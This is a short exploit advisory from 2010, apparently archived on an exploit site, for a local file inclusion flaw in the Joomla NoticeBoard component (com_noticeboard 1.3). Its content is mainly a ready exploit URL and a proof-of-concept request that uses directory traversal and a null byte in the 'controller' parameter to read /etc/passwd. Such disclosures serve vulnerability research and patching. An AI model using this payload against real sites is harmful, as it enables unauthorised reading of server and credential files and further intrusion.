id: 12028
date: 04/27/2010
title: Joomla Component NoticeBoard com_noticeboard Local File Inclusion
author: AntiSecurity
cves: 

===============================================================================
Joomla Component NoticeBoard com_noticeboard Local File Inclusion Vulnerability
===============================================================================

=================================================================
Joomla Component NoticeBoard com_noticeboard Local File Inclusion
=================================================================

=================================================================================================================
 
 
  [o] Joomla Component NoticeBoard Local File Inclusion Vulnerability
  
       Software : com_noticeboard version 1.3
       Vendor   : http://www.code-garage.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
=================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_noticeboard&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00
 
 
=================================================================================================================




#  0day.today [2023-03-24]  #